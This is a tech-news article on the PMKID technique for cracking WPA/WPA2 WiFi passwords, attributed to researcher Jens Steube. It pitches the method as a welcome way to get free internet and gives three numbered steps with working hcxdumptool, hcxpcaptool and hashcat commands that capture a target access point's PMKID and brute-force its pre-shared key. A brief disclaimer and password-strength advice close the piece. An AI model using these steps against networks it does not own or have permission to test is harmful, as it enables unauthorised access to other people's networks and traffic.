Wifi password hacking has become popular as people are always in search of the free internet. But due to the advancement of technology, cracking passwords have become a difficult task to do. The reason is due to the implementation of WPA/WPA2 (wifi protected access) protocols. They made modern routers more secure and less prone to hacking.

Luckily security researchers have revealed a new way to hack these modern wi-fi routers. This new hack was accidentally discovered by Jens Steube (lead developer in popular password-cracking tool Hashcat) while he was analyzing the newly-launched WPA3 protocol. According to him, this hack will explicitly work against WPA/WPA2 wireless network protocols with Pairwise Master Key Identifier (PMKID)-based roaming features enabled. This hack will surely allow attackers (aka.Hackers) to recover the Pre-shared Key (PSK) login passwords.

Disclaimer: All content in this article are intended for security research purpose only. Techworm does not support the use of any tool to indulge in unethical practices.

4-Way Handshake based PMKID stands for pairwise key management protocol. According to Steube (security researcher), previous wifi attacking methods requires someone to log into the network so that attackers can capture EAPOL (Extensible Authentication Protocol (EAP) over LAN ) which is a network authentication protocol used in IEEE 802.1X. whereas new hack doesn’t require a user to be on a target network in order to capture credentials. Following are the steps to perform this wifi hack:-

Step-1: A hacker can use a tool such as hcxpcaptool to request the PMKID from the targeted access point and dump the received frame to a file.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Step-2: Using the hcxpcaptool , the output (in pcapng format) of the frame can be converted into a hash format accepted by Hashcat like this.

$ ./hcxpcaptool -z test.16800 test.pcapng

Step-3:  Now you can use this password cracking tool to obtain the WPA PSK (Pre-Shared Key) password and Boom you did it!

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

That’s the password of your targeted wireless network which may take time to crack depending on its size or length complexity.

Now we are not sure about which vendors this technique will work. But Steube said it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers). So users are highly advised to protect their WiFi networks with a secure password such as making the use of numbers, characters and some special characters as they are difficult to crack. At last, we want to admit that this hack won’t work against next-gen WPA3 simply because of the new harder to break protocol.

Source:Techworm